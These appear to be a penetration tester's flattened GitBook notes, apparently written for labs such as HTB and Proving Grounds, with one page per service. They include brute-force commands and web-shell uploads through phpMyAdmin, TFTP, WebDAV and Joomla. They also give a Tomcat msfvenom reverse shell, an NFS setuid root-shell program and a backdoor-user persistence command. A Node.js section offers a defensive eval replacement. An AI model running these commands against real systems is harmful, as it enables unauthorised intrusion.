```text
├── README.md
├── mobile
│   ├── ios
│   │   ├── README.md
│   │   └── ios-forensics.md
│   ├── android
│   │   └── support-and-tools.md
│   └── tcm-mobile
│       └── README.md
├── phishing
│   ├── phishing-hiddeneye.md
│   └── phishing.md
├── pentesting-network
│   ├── 11211-memcached.md
│   ├── 135-rpc.md
│   ├── 9200-9300-elasticsearch.md
│   ├── 80-443-http-s
│   │   ├── drupal.md
│   │   ├── node.js.md
│   │   ├── phpmyadmin.md
│   │   ├── joomla.md
│   │   ├── webdav.md
│   │   ├── tomcat.md
│   │   ├── wordpress.md
│   │   └── README.md
│   ├── 6667-irc.md
│   ├── 3632-distcc.md
│   ├── 23-telnet.md
│   ├── 464-kpasswd.md
│   ├── 137-138-139-netbios.md
│   ├── 88-kerberos.md
│   ├── 111-rpcbind.md
│   ├── 79-finger.md
│   ├── 5985-winrm.md
│   ├── 69-tftp.md
│   ├── 873-rsync.md
│   ├── 3128-squid.md
│   ├── 5900-vnc.md
│   ├── 27017-27018-27019-mongodb.md
│   ├── 5432-postgresql.md
│   ├── 2049-nfs.md
│   ├── 21-ftp.md
│   ├── 110-pop3.md
│   ├── 389-ldap.md
│   ├── 3389-rdp.md
│   ├── 3306-mysql.md
│   ├── 5984-6984-couchdb.md
│   ├── 22-ssh.md
│   ├── 161-snmp.md
│   ├── 53-dns.md
│   ├── 1433-mssql.md
│   ├── 25-smtp.md
│   ├── 6379-redis.md
│   └── 139-445-smb.md
├── .gitbook
│   └── assets
│       └── image.png
├── pentesting-web
│   ├── xss-cross-site-scripting
│   │   └── README.md
│   ├── unrestricted-file-upload.md
│   ├── nosql-injection.md
│   ├── burp-suite.md
│   ├── web-testing.md
│   ├── authentication.md
│   ├── command-injection
│   │   └── README.md
│   ├── idor-insecure-direct-object-reference.md
│   └── jwt-attacks.md
├── misc
│   ├── note-taking.md
│   ├── todo.md
│   ├── containers.md
│   ├── interesting-files.md
│   ├── powershell.md
│   ├── networking.md
│   └── linux.md
├── post-exploitation
│   ├── cleanup.md
│   ├── maintaining-access.md
│   ├── passwords.md
│   └── tunneling-and-port-forwarding.md
├── apis
│   ├── methodology
│   │   └── README.md
│   └── resources.md
├── scanning-and-enumeration
│   ├── enumeration.md
│   ├── network-scanning.md
│   └── vulnerability-scanning.md
├── penetration-testing-methodology
│   ├── the-cyber-kill-chain.md
│   └── 5-stages-of-ethical-hacking.md
├── exploitation
│   └── exploitation-basics.md
├── information-gathering-reconnaissance
│   └── passive-reconnaissance.md
├── cloud
│   └── aws
│       └── README.md
├── active-directory
│   ├── peh
│   │   ├── README.md
│   │   ├── post-compromise-attacks.md
│   │   ├── initial-attack-vectors.md
│   │   └── post-compromise-enumeration.md
│   └── ad-basics.md
├── wireless
│   └── wireless-hacking-101.md
└── SUMMARY.md
```

/README.md:
--------------------------------------------------------------------------------

# Page 1

/mobile/ios/README.md:
--------------------------------------------------------------------------------

# iOS

/phishing/phishing-hiddeneye.md:
--------------------------------------------------------------------------------

# Phishing: HiddenEye

/pentesting-network/11211-memcached.md:
--------------------------------------------------------------------------------

# 11211 (Memcached)

/pentesting-network/135-rpc.md:
--------------------------------------------------------------------------------

# 135 (RPC)

## Enumeration

/pentesting-network/9200-9300-elasticsearch.md:
--------------------------------------------------------------------------------

# 9200, 9300 (Elasticsearch)

/.gitbook/assets/image.png:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/H3r1CH/penetration-testing/HEAD/.gitbook/assets/image.png

/pentesting-web/xss-cross-site-scripting/README.md:
--------------------------------------------------------------------------------

# XSS (Cross-Site Scripting)

## Finding
### Reflected

### Stored

### DOM-based

## Exploiting

/misc/note-taking.md:
--------------------------------------------------------------------------------

# Note Taking

## Note Taking Tools

* KeepNote
* OneNote
* CherryTree
* Joplin

## Screenshot Tools

* Greenshot
* Flameshot

/pentesting-network/80-443-http-s/drupal.md:
--------------------------------------------------------------------------------

# Drupal

## Scanning

### drupwn

```bash
drupwn enum http://<IP>
```

### droopescan

```bash
droopescan scan -u http://<IP>
```

/misc/todo.md:
--------------------------------------------------------------------------------

# TODO

## Checklist

### HTB

#### ippsec videos / ippsec.rocks

* [ ] Timelapse
* [ ] ...

#### Rana, oxdf, other writeups

### THM

#### Service Enumeration

/post-exploitation/cleanup.md:
--------------------------------------------------------------------------------

# Cleanup

## Cleanup Overview

* Make the system/network as it was when you entered it
* Remove executables, scripts, and added files
* Remove malware, rootkits, and added user accounts
* Set settings back to original configurations

/pentesting-network/80-443-http-s/node.js.md:
--------------------------------------------------------------------------------

# Node.js

## Exploitation

### Eval RCE

1. Intercept the request
   1. Test parameters for URL/base64 encoding
   2. Test parameters for arithmetic evaluation, e.g. `1+1`, and see if the response contains `2`.
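A hardened replacement for the `eval()` call that these steps probe for, as an added example (not from the original notes): it decodes a URL- or base64-encoded parameter as step 1 describes, then evaluates only an arithmetic grammar, so `1+1` still returns 2 while identifiers, calls and statements are rejected with a 400. The `handleProbe` route is a hypothetical stand-in for an Express-style handler.

```javascript
// Added example, not from the original notes: a strict arithmetic evaluator
// that replaces eval() for a parameter that is only meant to carry a number
// or a simple sum. The "1+1" probe still yields 2, while identifiers, calls,
// quotes and template literals never reach a JavaScript interpreter.

// Only digits, arithmetic operators, parentheses and a decimal point are allowed.
const ARITHMETIC_ONLY = /^[0-9+\-*/().]+$/;
const isNumChar = (c) => (c >= "0" && c <= "9") || c === ".";

// Step 1 of the notes: the parameter may arrive URL- or base64-encoded.
// Decode it the way the application would, then validate the decoded text.
function decodeParam(raw, encoding) {
  if (encoding === "url") return decodeURIComponent(raw);
  if (encoding === "base64") return Buffer.from(raw, "base64").toString("utf8");
  return raw;
}

// Split the expression into number and operator tokens; null means "reject".
function tokenize(src) {
  if (typeof src !== "string") return null;
  const s = src.replace(/\s+/g, "");
  if (s.length === 0 || !ARITHMETIC_ONLY.test(s)) return null;
  const tokens = [];
  let i = 0;
  while (i < s.length) {
    if (isNumChar(s[i])) {
      let j = i;
      while (j < s.length && isNumChar(s[j])) j++;
      const num = s.slice(i, j);
      if (!/^\d+(\.\d+)?$/.test(num)) return null; // rejects "." and "1.2.3"
      tokens.push(num);
      i = j;
    } else {
      tokens.push(s[i]); // one of + - * / ( )
      i++;
    }
  }
  return tokens;
}

// Recursive-descent evaluation of:
//   expr   := term (('+'|'-') term)*
//   term   := factor (('*'|'/') factor)*
//   factor := number | '(' expr ')' | '-' factor
function safeArith(src) {
  const tokens = tokenize(src);
  if (tokens === null) return { ok: false, error: "not an arithmetic expression" };
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];
  const fail = (msg) => { throw new SyntaxError(msg); };

  function factor() {
    const t = next();
    if (t === undefined) fail("unexpected end of input");
    if (t === "(") {
      const v = expr();
      if (next() !== ")") fail("missing )");
      return v;
    }
    if (t === "-") return -factor();
    if (/^\d/.test(t)) return Number(t);
    return fail("unexpected token " + t);
  }
  function term() {
    let v = factor();
    while (peek() === "*" || peek() === "/") {
      const op = next();
      const r = factor();
      v = op === "*" ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === "+" || peek() === "-") {
      const op = next();
      const r = term();
      v = op === "+" ? v + r : v - r;
    }
    return v;
  }

  try {
    const value = expr();
    if (pos !== tokens.length) fail("trailing tokens");
    if (!Number.isFinite(value)) throw new RangeError("non-finite result"); // e.g. 1/0
    return { ok: true, value };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Hypothetical handler (stand-in for an Express-style route): decode, then
// evaluate with the safe parser instead of eval(). Returns what it would send.
function handleProbe(rawParam, encoding) {
  let decoded;
  try {
    decoded = decodeParam(rawParam, encoding); // decodeURIComponent throws on bad %-escapes
  } catch (e) {
    return { status: 400, body: "rejected: malformed encoding" };
  }
  const result = safeArith(decoded);
  return result.ok
    ? { status: 200, body: String(result.value) }
    : { status: 400, body: "rejected: " + result.error };
}
```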
Example: Dibble on Proving Grounds

/pentesting-network/6667-irc.md:
--------------------------------------------------------------------------------

# 6667 (IRC)

## Enumeration

### nmap

```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
```

## Brute Force

### nmap

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <port> <IP>
```

/post-exploitation/maintaining-access.md:
--------------------------------------------------------------------------------

# Maintaining Access

## Maintaining Access Overview

### Persistence Scripts

* Run `persistence -h`
* `exploit/windows/local/persistence`
* `exploit/windows/local/registry_persistence`

### Scheduled Tasks

* Run `scheduleme`
* Run `schtaskabuse`

### Add a User

* `net user hacker password123 /add`

/pentesting-web/unrestricted-file-upload.md:
--------------------------------------------------------------------------------

# Unrestricted File Upload

### Scenarios

#### Blog comment where you can upload a photo

Copy the php-reverse-shell.php file and insert `GIF89a;` at the top of it:

```bash
GIF89a;
```

```bash
# Use searchsploit on nmap Service output details
```

## Exploitation Checks

Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:

```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" <IP>
```

/pentesting-network/23-telnet.md:
--------------------------------------------------------------------------------

# 23 (Telnet)

## Enumeration

### Banner Grabbing

```bash
nc -vn <IP> 23
```

### nmap Scripts

```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```

## Brute Force

```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt <IP> telnet
hydra -l root -P passwords.txt [-t 32] <IP> telnet
```

/misc/containers.md:
--------------------------------------------------------------------------------

# Containers

## Enumeration

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md)

### deepce

Like LinEnum.sh for containers.

[https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce)

/apis/methodology/README.md:
--------------------------------------------------------------------------------

# Methodology

## Methodologies

* [https://github.com/dsopas/MindAPI](https://github.com/dsopas/MindAPI)
* [https://github.com/shieldfy/API-Security-Checklist](https://github.com/shieldfy/API-Security-Checklist)
* [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting)

## Recon

## Attack

/pentesting-network/464-kpasswd.md:
--------------------------------------------------------------------------------

# 464 (kpasswd)

## nmap output

```bash
464/tcp open kpasswd5?
```

> The fact you're seeing this service and port suggests you may be scanning a Domain Controller, for which both UDP & TCP ports 464 are used by the Kerberos Password Change. This port in particular is used for changing/setting passwords against Active Directory.
>
> [https://security.stackexchange.com/questions/205492/what-is-this-service](https://security.stackexchange.com/questions/205492/what-is-this-service)

/pentesting-network/137-138-139-netbios.md:
--------------------------------------------------------------------------------

# 137,138,139 (NetBIOS)

## Enumeration

### Commands & Tools

#### nbtstat

```bash
nbtstat -n
nbtstat -A <IP>
```

#### nbtscan

```bash
nbtscan -v <IP range>
```

#### net

```bash
net view                      # List domains, computers, and shared resources
net use K: \\<computer>\C     # Connect to a shared resource on a computer
```

#### nmap

```bash
sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
```

/pentesting-network/80-443-http-s/phpmyadmin.md:
--------------------------------------------------------------------------------

# phpMyAdmin

## Enumeration

Default credentials: `root:` (empty password)

## Exploitation

### Web Shell

1. Identify the web server path, e.g. WAMP server is `C:/wamp/www/`
2. Create the web shell file via an SQL query in phpMyAdmin:
   1. `select "" into outfile "C:/wamp/www/shell.php"`
3. Navigate to the path of the uploaded shell and execute a command:
   1. `http://<IP>/shell.php?cmd=whoami`
4. If successful, command execution is available.

/pentesting-network/88-kerberos.md:
--------------------------------------------------------------------------------

# 88 (Kerberos)

## Enumeration

### Authenticated

#### Kerbrute

```bash
/opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.10.86.5 -d lab.enterprise.thm /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -o users.txt
/opt/kerbrute/kerbrute_linux_amd64 passwordspray --dc <DC IP> -d intelligence.htb users.txt <password>
```

GetUserSPNs

```bash
kali@kali:~/ctf/tryhackme/enterprise$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.55.72 LAB.ENTERPRISE.THM/nik
```

/pentesting-network/80-443-http-s/joomla.md:
--------------------------------------------------------------------------------

# Joomla

## Interesting Files

* /administrator
* /administrator/manifests/files/joomla.xml
* /language/en-GB/en-GB.xml

## Scanning

### joomscan

```bash
perl joomscan.pl -u <URL>
```

## Exploitation

### Templates

1. View the template, copy it and rename the copy.
2. Select the newly created template, modify its index.php file with PHP reverse shell code, and save.
3. Start a netcat listener and navigate to the new template at /templates/shelly.

After getting on the filesystem, look at the web directory.
/pentesting-network/111-rpcbind.md:
--------------------------------------------------------------------------------

# 111 (Rpcbind)

## Enumeration

### Checks

* [ ] Check for passwords in files on mountable drives

### rpcbind

```bash
rpcinfo -p 192.168.1.101   # List the RPC programs registered with rpcbind on the host
```

### rpcinfo

```bash
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```

```bash
# Check general RPC info
rpcinfo <IP>

# Check which shares you can mount
showmount -e <IP>

# Mount the share
# Make the directory
mkdir /mnt/share
# Mount the share
mount -t nfs <IP>:/share /mnt/share -nolock
```

### nmap

```bash
nmap -v -p 111 --script=nfs* <IP>

rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID
```

/scanning-and-enumeration/enumeration.md:
--------------------------------------------------------------------------------

# Enumeration

TCM's modified script - [https://pastebin.com/MhE6zXVt](https://pastebin.com/MhE6zXVt)

## Some Steps

1. nmap scan
2. nmap script scan (http, smb, smtp, tftp, etc.)
3. Metasploit enumeration
4. searchsploit / exploitDB (others)
5. Google

### Other Tools

* Reconnoitre
* Vanquish
* Sn1per
* SPARTA

## Ping

> When pinging a machine we can confirm the OS type by the TTL.
>
> Windows default TTL is 128, which decreases by 1 when a packet traverses a router, so look for 127. If it's between 64 and 128, chances are it's Windows.
>
> Linux default TTL is 64. If it's below 64, chances are it's Linux.
>
> Anything above 128, chances are it is network infrastructure. Cisco router is 255.

/pentesting-network/79-finger.md:
--------------------------------------------------------------------------------

# 79 (Finger)

## Enumeration

### Banner Grabbing

```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```

### nmap

```bash
nmap -vvv -Pn -sC -sV -p79 <IP>
```

### finger

```bash
finger @<IP>          # List users
finger admin@<IP>     # Get info of user
finger user@<IP>      # Get info of user
```

### finger-user-enum

```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```

### Metasploit

```bash
use auxiliary/scanner/finger/finger_users
```

## Command Execution

```bash
finger "|/bin/id@<IP>"
finger "|/bin/ls -a /@<IP>"

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```

/pentesting-network/5985-winrm.md:
--------------------------------------------------------------------------------

# 5985 (WinRM)

## Enumeration

## Connection

#### crackmapexec

```bash
crackmapexec winrm <IP> -u <user> -p <password>
crackmapexec winrm <IP> -u <user> -p <password> -X "whoami"   # Run a command
```

#### evil-winrm

PowerShell Remoting

```bash
# Attempt to log into the machine
evil-winrm -i <IP> -u <user> -p <password>
evil-winrm -i <IP> -u <user> -H <NTLM hash>
# Specify a local directory to execute scripts from
evil-winrm -i <IP> -u <user> -p <password> -s .
```

Upload File to Target

```bash
# From compromised target
Evil-WinRM PS C:\Users\FSmith\Documents> upload winPEAS.exe
Evil-WinRM PS C:\Users\FSmith\Documents> .\winPEAS.exe
```

Download File from Target

```bash
# From compromised target
Evil-WinRM PS C:\Users\FSmith\Documents> download 123_BloodHound.zip
```

/pentesting-network/69-tftp.md:
--------------------------------------------------------------------------------

# 69 (TFTP)

## Enumeration

### Checks

* [ ] Search for files to find sensitive info like passwords
* [ ] Upload shells to trigger them in a webapp

### nmap

```bash
nmap -sU -p 69 --script tftp-enum.nse <IP>
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```

### Connection

```bash
# Set up the connection
tftp 172.16.200.100
# Get a file
tftp> get /etc/passwd
# Upload reverse shell
tftp> put shell.php

# Needs unauthenticated access
tftp <IP>
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
```

### Metasploit

```bash
msfconsole
use tftpbrute
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt

msf5> auxiliary/admin/tftp/tftp_transfer_util
```

/pentesting-network/873-rsync.md:
--------------------------------------------------------------------------------

# 873 (rsync)

## Enumeration

### Banner

#### nc

```bash
nc -vn <IP> 873
```

### Modules

#### nmap

```bash
sudo nmap -sV --script "rsync-list-modules" -p 873 <IP>
```

#### Metasploit

```bash
msf> use auxiliary/scanner/rsync/modules_list
```

### rsync

Unauthenticated

```bash
rsync -av --list-only rsync://192.168.76.126/fox
rsync -av rsync://192.168.76.126/fox ./rsync/
```

Authenticated

```bash
rsync -av --list-only rsync://username@192.168.0.123/fox
rsync -av rsync://username@192.168.0.123:8730/fox ./rsync_shared
```

Upload a file (e.g. an `authorized_keys` file to obtain access to a machine)

```bash
mkdir .ssh
ssh-keygen -f .ssh/fox-ssh -t ecdsa -b 521
cp .ssh/fox-ssh.pub .ssh/authorized_keys
rsync -av .ssh/ rsync://fox@192.168.76.126/fox/.ssh
```

## Brute Force

```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```

/misc/interesting-files.md:
--------------------------------------------------------------------------------

# Interesting Files

## File Types

### zip

```bash
# Try to unzip the file
unzip filename.zip
# If a password is needed, attempt to crack it
zip2john filename.zip >> filename.zip.hash
john filename.zip.hash --wordlist=/usr/share/wordlist/rockyou.txt
```

### rar

```bash
unrar e filename.rar
rar2john filename.rar >> filename.rar.hash
john filename.rar.hash --wordlist=/usr/share/wordlist/rockyou.txt
```

### pfx

```bash
# Try to view file info
openssl pkcs12 -in filename.pfx -info
# If a password is needed, attempt to crack it
pfx2john filename.pfx >> filename.pfx.hash
john filename.pfx.hash --wordlist=/usr/share/wordlist/rockyou.txt
```

After putting in the password it will extract certificates and private keys.

```bash
# Extract the keys
openssl pkcs12 -in filename.pfx -nocerts -out key.pem -nodes
# Extract the certificates
openssl pkcs12 -in filename.pfx -nokeys -out key.cert
```

If the WinRM port (5985, 5986) is open it could be possible to log in to the target using Evil-WinRM.
```bash
evil-winrm -S -i <IP> -c key.cert -k key.pem
```

/pentesting-web/nosql-injection.md:
--------------------------------------------------------------------------------

# NoSQL Injection

## Example

> Example using a login form for Admin Access with username and password

* Intercept the login request with a basic username and password.
* If the Content-Type and data are not in JSON form it will have to be converted:
  * Manually, changing Content-Type to `application/json`
  * Burp Extension 'Content Type Converter'
    * Then right click in the request, select Content Type Converter, and select JSON
  * May still need to modify the data to use JSON format, ex:
    * Before: `username=admin@admin.com&password=password&redirectPage=`
    * After: `{"username": "admin@admin.com", "password": "password"}`
* Send the request to get some response
* Example payloads below:

```bash
# Grab the user where username is admin@admin.com and the password is not equal to blank
{"username": "admin@admin.com", "password": {"$ne":""}}
# ... and where the password has a value greater than an empty string
{"username": "admin@admin.com", "password": {"$gt":""}}
```

## Payloads

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)

/pentesting-network/3128-squid.md:
--------------------------------------------------------------------------------

# 3128 (Squid)

## Enumeration

#### curl

```bash
curl --proxy http://192.168.76.189:3128 http://192.168.76.189
# After finding other open ports using spose:
curl --proxy http://192.168.76.189:3128 http://192.168.76.189:3306
curl --proxy http://192.168.76.189:3128 http://192.168.76.189:8080
```

#### spose

[https://github.com/aancw/spose](https://github.com/aancw/spose)

```bash
python3 spose.py --proxy http://192.168.76.189:3128 --target 192.168.76.189
Using proxy address http://192.168.76.189:3128
192.168.76.189 3306 seems OPEN
192.168.76.189 8080 seems OPEN
```

#### nmap

You can use `nmap` for additional scanning through `proxychains` by adding one of the following lines at the bottom of the proxychains.conf file:

`socks5 192.168.76.189 3128` or `http 192.168.76.189 3129`

```bash
proxychains sudo nmap -sT -n -p3306,8080 192.168.76.189 -Pn
```

#### Webpage

If a webpage is found, you can update the proxy settings in your browser or FoxyProxy with the proxy URL and port and then navigate to the page: [http://192.168.76.189:3128](http://192.168.76.189:3128)

/pentesting-network/80-443-http-s/webdav.md:
--------------------------------------------------------------------------------

# WebDAV

## Scanning

### nmap

```bash
nmap --script=http-webdav-scan,http-iis-webdav-vuln <IP>
# Check the allowed HTTP methods, especially PUT
```

### cadaver

```bash
cadaver <URL>
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx awen.txt   # Example uploading shell
dav:/> mv awen.txt awen.aspx                                  # Change the file type of the uploaded file
# Navigate to the awen.aspx file in the browser
```

```bash
kali@kali:~/Documents/offsec/oscp/proving_grounds/Hutch$ cadaver 192.168.71.122
Authentication required for 192.168.71.122 on server `192.168.71.122':
Username:
Password:
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
Uploading /usr/share/webshells/aspx/cmdasp.aspx to `/cmdasp.aspx':
Progress: [=============================>] 100.0% of 1400 bytes succeeded.
# Navigate to the cmdasp.aspx file in the browser
# Can then create a reverse shell payload with msfvenom, upload that using dav,
# then call it from the cmdasp.aspx page using the full path
```

### davtest

```bash
davtest --url http://<IP>
davtest -move -sendbd auto -url http://<IP>:8080/webdav/
```

/pentesting-network/5900-vnc.md:
--------------------------------------------------------------------------------

# 5900 (VNC)

## Checks

* [ ] Check for easy VNC passwords
* [ ] Check for exploits for the VNC version
* [ ] Brute force the VNC password

## Enumeration

### nmap

```bash
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass -oA 5900_nmap_VNC <IP>
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 <IP>
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <port> <IP>
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <port> <IP>
```

### Metasploit

#### Login Scan

```bash
use auxiliary/scanner/vnc/vnc_login
set rhosts <IP>
run
```

#### No-auth Scan

```bash
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts <IP>
run
```

#### Post exploit module

```bash
background
use post/windows/gather/credentials/vnc
set session X
exploit

vncviewer 192.168.1.109
```

## Connection

```bash
vncviewer [-passwd passwd.txt] <IP>::5901
vncviewer <IP>:<display>
```

## Brute Force

```bash
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 <IP> vnc
hydra -L <users file> -P <passwords file> -s <port> <IP> vnc -u -vV
```

/pentesting-network/27017-27018-27019-mongodb.md:
--------------------------------------------------------------------------------

# 27017, 27018, 27019 (MongoDB)

## Login

By default mongo does not require a password.
**Admin** is a common mongo database.

```bash
mongo <IP>
mongo <IP>:<port>
mongo <IP>:<port>/<db>
mongo -u <user> -p '<password>'
```

The nmap script _**mongodb-brute**_ will check if creds are needed.

```bash
nmap -n -sV --script mongodb-brute -p 27017 <IP>
```

**Some MongoDB commands:**
```mongodb
help
show dbs
use <db>
show collections
db.<collection>.find()                  // Dump the collection
db.<collection>.count()                 // Number of records of the collection
db.current.find({"username":"admin"})   // Find in current db the username admin
```
31 | 32 | ```mongodb 33 | use // Create and switch to new DB 34 | db.users.insertOne({name: 'jeremy'}) // Insert some data into the DB 35 | db.users.insertOne({name: 'jessamy', country: 'scotland'}) 36 | db.users.find() 37 | db.users.find().limit(1) // View the first record 38 | db.users.find({country: 'scotland'}) // Find records where the country as scotland 39 | db.users.find({country: {"$ne": 'scotland'}}) // Find records where country is not scotland 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /pentesting-network/5432-postgresql.md: -------------------------------------------------------------------------------- 1 | # 5432 (postgresql) 2 | 3 | ## Enumeration 4 | 5 | ### Connection 6 | 7 | #### Default Credentials 8 | 9 | `postgres:postgres` 10 | 11 | ```bash 12 | psql -U # Open psql console with user 13 | psql -h -U -d # Remote connection 14 | psql -h -p -U -W # Remote connection 15 | ``` 16 | 17 | ### Commands 18 | 19 | ```sql 20 | psql -h localhost -d -U # Password will be prompted 21 | \list # List databases 22 | \c # use the database 23 | \d # List tables 24 | \du+ # Get users roles 25 | ``` 26 | 27 | ## Exploitation 28 | 29 | ### RCE - Authenticated 30 | 31 | #### searchsploit 32 | 33 | ```bash 34 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Nibbles$ searchsploit postgresql 35 | --------------------------------------------------------------------------------- --------------------------------- 36 | Exploit Title | Path 37 | --------------------------------------------------------------------------------- --------------------------------- 38 | PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) | multiple/remote/50847.py 39 | --------------------------------------------------------------------------------- --------------------------------- 40 | ``` 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /pentesting-network/2049-nfs.md: 
# 2049 (NFS)

## Enumeration

### nmap Scripts

```bash
nmap -p 2049 --script=nfs* <ip>
# nfs-ls        List files on the exports and check permissions
# nfs-showmount Like showmount -e
# nfs-statfs    Disk statistics and info for each NFS share
```

### Metasploit

Scan NFS mounts and list permissions.

```bash
use auxiliary/scanner/nfs/nfsmount
```

### Check Shares

Check the available folders and, if you already have a shell on the host, the export options (`no_root_squash` is what makes the setuid trick below work).

```bash
showmount -e <ip>
cat /etc/exports # List exported shares and their options (on the NFS server)
```

## Mounting

### Create Mount

```bash
# Syntax
mount -t nfs [-o vers=2] <ip>:<share> <mountpoint> -o nolock
# Example
mkdir /mnt/myroot
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/myroot -o nolock
# Unmount the mount
umount /mnt/myroot/
```

#### Using SSH

If the export contains the target's root filesystem (or a home directory) and is writable, drop your public key into `authorized_keys`. Writing into `/root/.ssh` only succeeds when the export has `no_root_squash`; otherwise your root writes are mapped to `nobody`.

```bash
ssh-keygen # Generate a key pair
mkdir /mnt/myroot
mount -t nfs <ip>:/ /mnt/myroot
cat ~/.ssh/id_rsa.pub >> /mnt/myroot/root/.ssh/authorized_keys
umount /mnt/myroot/
ssh -i ~/.ssh/id_rsa root@<ip>
```

### Example Exploit

Needs `no_root_squash` on the export (so the binary ends up root-owned with the setuid bit intact) and a binary that matches the target's architecture and libc; compile with `-static` if in doubt.

#### From Attacker as root user

```bash
mkdir <mountpoint>
mount -v -t nfs <ip>:<share> <mountpoint>
cd <mountpoint>
cat > pwn.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setreuid(0, 0); setregid(0, 0); system("/bin/bash"); return 0; }
EOF
gcc pwn.c -o pwn
chmod u+s pwn
```

#### From Target as Victim

```bash
cd <share>
./pwn # Root shell
```
-------------------------------------------------------------------------------- /penetration-testing-methodology/the-cyber-kill-chain.md: --------------------------------------------------------------------------------
# The Cyber Kill Chain

## 7 Stages

1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command and control
7. Actions on objectives

### Reconnaissance

* Cyber equivalent of "casing the joint"
* IP address scan of the business domain
* Port scan of active hosts
* Identify vectors for attack
* Checking software versions
* Automated scanning to scale the attack (botnets)

### Weaponization

* Pair an exploit for the target's vulnerability with a payload
* Integrate into a cyberattack platform
* Or purchased ready to run

### Delivery

* Email attachment
* Compromised website
* Log into the target
  * Default credentials
  * Stolen credentials
* Internet-exposed vulnerability
* Flash drive

### Exploitation

* Exploit a vulnerability
* Unauthorized use of credentials
* Unwitting execution of malware by the user

### Installation

* Install payload into memory or onto disk
* Execute payload after system restart (persistence)
* Provides ongoing access

### Command and Control

* Connect to the command and control server
* Receive commands
  * List subdirectories and files
  * Extract a named file
  * Modify or replace software
* Determine the command and control server address

### Actions

* Actions on objectives
  * Deface website
  * Steal sensitive information
  * Access a bank account
-------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/tomcat.md: --------------------------------------------------------------------------------
# Tomcat

## Exploitation Checks

* Open Tomcat Manager (**/manager/html**)
* Check to see if any of the default credentials will work to log in. Common ones:
  * `admin:admin`
  * `tomcat:tomcat`
  * `admin:`
  * `admin:s3cr3t`
  * `tomcat:s3cr3t`
  * `admin:tomcat`
* If so, we may be able to upload a war file to get a reverse shell.
* After uploading and deploying the war file, start a `netcat` listener, then click the war's entry in the Application Path column of the Manager page (or browse to `http://<ip>:8080/<warname>/`) to trigger the JSP.
* Open Tomcat Administration
* Check to see if any of the default credentials will work to log in.
* Check the **/manager/status** path to look for version details and then known exploits, especially if you cannot access **/manager/html**.

### MSFvenom Reverse Shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
nc -lvnp <port> # Listener for the callback
```

### Metasploit

```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set RHOSTS <ip>
msf exploit(multi/http/tomcat_mgr_upload) > set RPORT <port>
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername <user>
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```

## Brute Force

### Hydra

```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```

### Metasploit

```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
-------------------------------------------------------------------------------- /pentesting-network/21-ftp.md: --------------------------------------------------------------------------------
# 21 (FTP)

## Enumeration

